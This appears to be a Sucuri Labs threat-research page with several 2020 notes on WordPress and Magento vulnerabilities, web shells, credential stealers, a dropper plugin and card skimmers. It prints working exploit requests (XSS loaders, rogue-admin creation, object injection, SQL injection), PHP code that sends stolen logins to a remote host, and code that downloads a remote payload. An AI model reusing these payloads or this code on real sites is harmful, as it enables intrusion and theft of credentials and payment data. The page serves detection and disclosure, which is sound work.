Sucuri Labs

The home of our Security Engineering Group, including our Threat Research, Technical Security and Automation teams.

Unauthenticated Stored Cross Site Scripting in WP Support...

 

Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6

 

During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.

unknown shell packer

Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Support Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

B374k Web Shell Packer

PHP web shells are a type of backdoor which, when left on compromised websites, allow attackers to maintain unauthorized access after initial compromise.

To further evade detection, attackers may also choose to keep a packer script on a compromised website instead of the actual PHP web shell. They can then use this script to generate the PHP web shell on an as-needed basis.

One of the more common PHP web shells is b374k.php. It’s popular with bad actors because it offers a lot of features including a file manager, database connect, various text conversions, and email via PHP.

Let’s take a look at how attackers can load b374k.php with a packing script, seen below.

unknown shell packer

This unknown shell packer offers a few different options to the attacker:

  • Output - Defines the filename of the PHP web shell to be created
  • Password - Sets a password used to limit access to the PHP web shell
  • Module - Optional features that can be enabled: convert, database, info, mail, network, processes
  • Theme - Optional color theme
  • Strip Comments and Whitespaces - Removes unneeded code comments and whitespaces
  • Base64 Encode - encodes the PHP web shell’s code with base64
  • Compress - Compresses the PHP code with various PHP functions like gzdeflate, gzencode, gzcompress. This feature requires the code to have already been base64 encoded.

Attackers can also run the packer by submitting the parameters through PHP CLI, if available.

cli for b374k packer

Regardless of whether the attacker opts for the PHP CLI or the browser GUI, the result is a generated PHP shell with the chosen filename — in this case unknown.php — which is dropped in the current directory.

interface for b374k packer

These types of malicious scripts can be found planted anywhere within a website’s environment, so the best way to mitigate threat is to prevent unauthorized access to your website in the first place. Practice strong password security principles and use a firewall to prevent a password from brute force.

Vulnerabilities Digest: April 2020

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
Widget Settings Importer/Exporter Stored XSS Closed 40000
Accordion Stored/Reflected XSS 2.2.9 30000
Support Ticket System By Phoeniixx Reflected XSS Closed 2000
Gutenberg Blocks Authenticated Settings Change 1.14.8 200000
WP Lead Plus X Stored XSS 0.99 70000
OneTone Stored XSS Closed 20000
WP Advanced Search SQL Injection 3.3.6 1000
Easy Forms for Mailchimp Authenticated XSS 6.6.3 100000
CM Pop-Up banners Stored XSS 1.4.11 10000
Duplicate Page and Post SQL Injection 2.5.8 50000
WP post page close SQL Injection Closed ----

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL Injection in WP-Advanced-Search which was caused by an improper handling of user input data.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload] 

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries.

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload] 

Vulnerable Code:

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup builder plugin allows site owners to easily create promotion popups. This past month, versions < 3.64 were affected by an unauthenticated stored XSS and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D= 

Many other plugins are still under attack. Please check our previous lab notes for more information.

Detected IPs
185.212.128.162
164.132.194.160
188.166.16.17
66.228.44.215
173.249.6.22
54.39.10.60
5.196.207.195
84.238.108.177
109.96.171.178
92.119.185.126

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites.

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs
195.154.177.210
5.135.143.224
84.238.108.177
109.96.171.178
92.119.185.126
82.77.172.62
82.78.189.130

Old Magento Versions Still Exploited

Unpatched Magento sites will be always targeted by attackers and that’s why we encourage users to implement all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago and attackers are still taking advantage of them.

We've listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache - Object Injection

154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart - Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- 2020-04-14

Magento Core - SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

WordPress Admin Login Stealer

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file wp-login.php to intercept the information of a valid user and send it to the attacker.

The script gathers the site URL, IP, username and password details, then sends them to the remote site via curl.

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip=$_SERVER['REMOTE_ADDR'];
$ccc_url=base64_decode("aHR0cDovLzEuc2FsZWZvcnlvdS5vcmcvdG9uZy9wYS9uZXdwdy9wYXNzLnBocD9hZG1pbmlwPQ").base64_encode($ip)."&host=".base64_encode($url)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
$ccc=@file_get_contents($ccc_url);
if(empty($ccc)){function get_pass_Html($url){$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
curl_exec($ch);
curl_close($ch);
return true;
}
get_pass_Html($ccc_url);
}
setcookie("whatsup","whatsupman",time()+3600*24*365);

Further analysis reveals that the base64 encoded string in this malicious script is actually the attacker’s URL:

hxxp://[1].saleforyou[.]org/tong/pa/newpw/pass.php?adminip=

Here is the information sent via curl:

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=$ip&host=$url&name=$_POST['log']&password=$_POST['pwd']

Malware Variants & Sub-Domains

This login stealing malware appears to have been distributed and used on other websites for about a year now. The same top-level domain has also been seen in other malware variations, but uses a different subdomain: 5[.]saleforyou[.]org

GET_Html('http://5[.]saleforyou[.]org/ming/exam/main.php?key='.$_GET['exam']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);

Another variation also appears to be collecting server IP and HTTP_HOST using a different URL on the same domain:

curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$content = curl_exec($ch);curl_close($ch);}return $content;}$jturl = "http://1[.]saleforyou[.]org/tong/get/htc/1.php?adminip=".$server_ip."&host=".$_SERVER['HTTP_HOST'];
  • saleforyou[.]org. 300 IN A 23.88.229.79 \ Enzu Inc.
  • 1.saleforyou[.]org. 300 IN A 172.246.126.170 \ Enzu Inc.
  • 2.saleforyou[.]org. 300 IN A 192.157.233.59 \ Enzu Inc.
  • 3.saleforyou[.]org. 300 IN A 192.157.233.176 \ Enzu Inc.
  • 4.saleforyou[.]org. 300 IN A 23.89.201.143 \ Enzu Inc.
  • 5.saleforyou[.]org. 300 IN A 144.208.127.115 \ Shock Hosting LLC
  • 6.saleforyou[.]org. 300 IN A 208.123.119.189 \ Shock Hosting LLC

It looks like Enzu Inc. has a long history of facilitating malware, spam, and general abuse; their IPs are listed in Stop Badware’s top 50 lists:

Each subdomain is being used for a different campaign, with some hosted on different servers — and even different datacenters.

Related Domains

Another domain, bingstyle[.]com, appears to be related. Attackers are using a similar URL structure for malicious files: tong/pa/pass.php

  • bingstyle[.]com. 300 IN A 104.31.70.141
  • bingstyle[.]com. 300 IN A 104.31.71.141

These Virustotal results suggest a relationship to saleforyou[.]org, or at least the same group: https://www.virustotal.com/gui/domain/bingstyle.com/relations

Unfortunately, bingstyle[.]com is using CloudFlare and we are unable to tell exactly where it's hosted.

Mitigation Steps

Login credential stealers like this one can easily be used as a backdoor to maintain unauthorized access to a website long after the initial infection. The malicious script will simply continue to send the stolen login credentials to the attacker until it is removed from the compromised environment.

To catch these types of infections, set up and maintain a file monitoring system to alert you to any changes in your core WordPress files and detect malicious activity along with other indicators of compromise.

Web Skimmer With a Domain Name Generator –...

This note is a follow up to our recent post about a web skimmer that uses a dynamic domain name generating algorithm. This week, analyst Ben Martin found another variation of the same malware. The script looks very similar.

web skimmer domain name generator

The changes here are pretty minor: it uses a “ql” domain prefix instead of “qr” and the Math.sin() function instead of Math.cos(). This new variation also uses the name of the compromised site as the script path on the generated malicious domain.

[location.host,'js'].join('.')

Otherwise, the idea is identical — the generated domain names are based on the current month and year. As seen in the original post, the domains for March through December of 2020 are already registered.

March ql202141[.]pw
April ql201243[.]pw
May ql201041[.]pw
June ql201721[.]pw
July ql202657[.]pw
August ql202989[.]pw
September ql202412[.]pw
October ql201456[.]pw
November ql201000[.]pw
December ql201463[.]pw

All of these domains were registered on March 13th, 2020 within one minute by a user with the email valentinakrudyanova@yandex.ru. Domains from the original post were registered on March 18th, 2020, indicating that this “ql” variation is a predecessor for the “qr” campaign.

A URL scan indicates that this variant has been in use since mid-March: ql202141.]pw domain.

The obfuscated scripts served by the generated domains are web skimmers similar to what we described in the previous post. In this case, they send stolen data to hxxps://mykada[.]com/js/ar/ar7938.php, a domain previously mentioned in a February post by Marco Ramilli. Back then, the malware was also found to be using exfiltration URLs like hxxps://mykada[.]com/js/ar/ar2497.php.

If you believe your Magento website has been infected, you can refer to our hacked Magento guide for step-by-step instructions on how to remove malware and harden a compromised environment.

Fake M-Shield WordPress Plugin

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found almost an identical plugin under the name kingof, with malicious code hosted in the file: ./wp-content/plugins/kingof/kingof.php

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of “random” files to check if they exist and their filesize is lower than 1000 bytes. If the condition isn’t met, the script downloads this malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and injects into contents into the files from the $amb array.

<?php
function shield_01()
{
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
          $f=ABSPATH.$f;
            if(!file_exists($f)||filesize($f)<1000) {
                if(!$wsd) 
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
              if($wsd)
                file_put_contents($f,$wsd);
          }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Magento JavaScript Skimmer Targets Tarjetas de Crédito

A website owner recently contacted us regarding a payment problem on their Magento website. A suspicious payment card form was loading for customers who were trying to pay for items in their shopping cart:

suspicious payment card form

This payment card form should NOT be displayed when the Tarjeta de Credito DISCOVER radio button is selected from the purchase process. The malicious "feature" was found to be loading due to an injection using the Javascript .click() event on the onestepcheckout-place-order element. This injection allows attackers to display their form and skim payment card details as they are entered.

 injection allowing attackers to display the malicious form  and skim credit card information

To exfiltrate the skimmed payment card data, the injection continues to use Javascript to encode data and send it to the malicious domain cdn-filestore[.]com, which itself is encoded in base64 to evade detection. All of this is accomplished through a Javascript function defined in the injection under the name onestepcheckout_payment():

function defined in malicious injection

After removing the malicious injection, the skimmer form no longer shows up on the checkout page of the Magento website. Instead, it shows the correct text and behavior which informs customers that they will be redirected to the payment processor’s website after submitting their order.

redirect to payment processor

It’s imperative that Magento websites take e-commerce security seriously, as they are responsible for customer data and breaches of transaction data on their online store. Perform regular security scans to detect infections, identify malware, and pinpoint other indicators of compromise.